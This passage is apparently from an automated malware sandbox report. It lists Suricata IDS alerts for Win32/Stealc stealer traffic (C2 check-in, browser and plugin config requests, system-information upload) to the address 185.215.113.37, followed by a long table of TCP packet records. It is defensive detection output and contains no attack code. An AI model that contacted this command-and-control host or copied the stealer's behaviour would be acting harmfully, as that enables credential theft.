DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-02T23:10:02.173952+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-02T23:10:02.395989+0200	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-02T23:10:02.402117+0200	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.37	80	192.168.2.5	49704	TCP
2024-10-02T23:10:02.631424+0200	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-02T23:10:02.640407+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.37	80	192.168.2.5	49704	TCP
2024-10-02T23:10:03.726856+0200	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-02T23:10:04.205057+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-02T23:10:10.665726+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-02T23:10:11.755535+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-02T23:10:12.411919+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-02T23:10:12.941595+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-02T23:10:15.166427+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-02T23:10:15.778698+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49704	185.215.113.37	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 2, 2024 23:10:01.205621004 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:01.210755110 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:01.210824013 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:01.211451054 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:01.216675043 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:01.928697109 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:01.928958893 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:01.932809114 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:01.938411951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:02.173763990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:02.173952103 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:02.174841881 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:02.179872990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:02.395694017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:02.395869017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:02.395988941 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:02.395988941 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:02.397031069 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:02.402117014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:02.631354094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:02.631423950 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:02.631426096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:02.631464005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:02.631484985 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:02.631504059 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:02.632601976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:02.632636070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:02.632658005 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:02.632690907 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:02.633800030 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:02.633867025 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:02.635200977 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:02.640407085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:02.854631901 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:02.854705095 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:02.867660046 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:02.867698908 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:02.872734070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:02.872951031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:02.872980118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:02.873013973 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:02.873044968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:02.873178959 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:02.873207092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:03.725023031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:03.726855993 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:03.964662075 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:03.971734047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.204886913 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.205007076 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.205043077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.205056906 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.205056906 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.205317020 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.207081079 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.207115889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.207164049 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.207164049 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.208961010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.208995104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.209116936 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.209116936 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.210920095 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.210956097 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.211010933 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.211010933 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.212044954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.212083101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.212112904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.212131023 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.212131023 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.212440968 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.307677984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.307713985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.307744980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.307976007 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.307976007 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.308453083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.308478117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.308618069 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.308618069 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.309617996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.309672117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.309695959 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.309806108 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.309807062 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.309807062 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.310753107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.310781002 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.310822964 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.310822964 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.312061071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.312118053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.312169075 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.312169075 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.313385010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.313421965 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.313474894 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.313474894 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.314630985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.314672947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.314721107 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.314722061 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.316226006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.316261053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.316400051 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.317447901 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.317482948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.317516088 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.317545891 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.317545891 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.317704916 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.318562984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.318597078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.318640947 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.318640947 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.319686890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.319741964 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.432777882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.432919979 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.433167934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.433207035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.433250904 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.433325052 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.433804035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.433840036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.433861017 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.433888912 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.434938908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.434967995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.434994936 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.435010910 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.435568094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.435601950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.435626030 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.435647011 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.436938047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.436973095 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.436997890 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.437005997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.437020063 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.437058926 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.438127995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.438163042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.438186884 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.438210964 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.439368010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.439428091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.439433098 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.439485073 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.440727949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.440762043 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.440783024 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.440808058 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.441665888 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.441701889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.441725969 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.441740990 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.442698002 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.442733049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.442754984 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.442765951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.442780972 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.442815065 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.443732023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.443767071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.443790913 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.443809986 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.444725037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.444760084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.444782019 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.444804907 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.445806980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.445841074 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.445864916 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.445890903 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.446822882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.446856976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.446883917 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.446892023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.446926117 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.446935892 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.447892904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.447926044 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.447949886 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.447971106 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.448720932 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.448755026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.448779106 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.448806047 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.449711084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.449745893 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.449770927 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.449786901 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.450508118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.450541973 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.450573921 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.450579882 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.450597048 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.450614929 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.451416969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.451452017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.451484919 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.451503038 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.452334881 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.452368975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.452392101 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.452415943 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.453140020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.453171968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.453200102 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.453213930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.555866003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.555958033 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.556119919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.556153059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.556175947 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.556200027 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.557044029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.557077885 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.557104111 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.557120085 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.557965040 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.558000088 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.558022022 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.558032036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.558048010 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.558084011 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.559005976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.559040070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.559062004 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.559084892 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.560101032 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.560137033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.560157061 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.560182095 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.561070919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.561105013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.561125040 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.561147928 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.561981916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.562015057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.562035084 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.562047005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.562060118 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.562097073 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.563003063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.563036919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.563061953 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.563070059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.563080072 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.563124895 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.563791037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.563824892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.563848019 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.563868046 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.564672947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.564707041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.564785004 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.564830065 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.565412045 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.565447092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.565469980 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.565500021 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.566296101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.566330910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.566355944 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.566370964 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.567058086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.567091942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.567114115 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.567123890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.567137957 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.567174911 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.567811012 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.567845106 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.567867994 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.567888975 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.568712950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.568747044 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.568768978 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.568794966 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.569446087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.569479942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.569515944 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.569535017 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.570314884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.570348978 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.570374966 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.570382118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.570399046 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.570434093 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.570986986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.571018934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.571043015 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.571068048 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.571847916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.571882963 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.571903944 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.571929932 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.572546959 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.572581053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.572602987 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.572628975 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.573295116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.573329926 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.573354006 CEST	49704	80	192.168.2.5	185.215.113.37
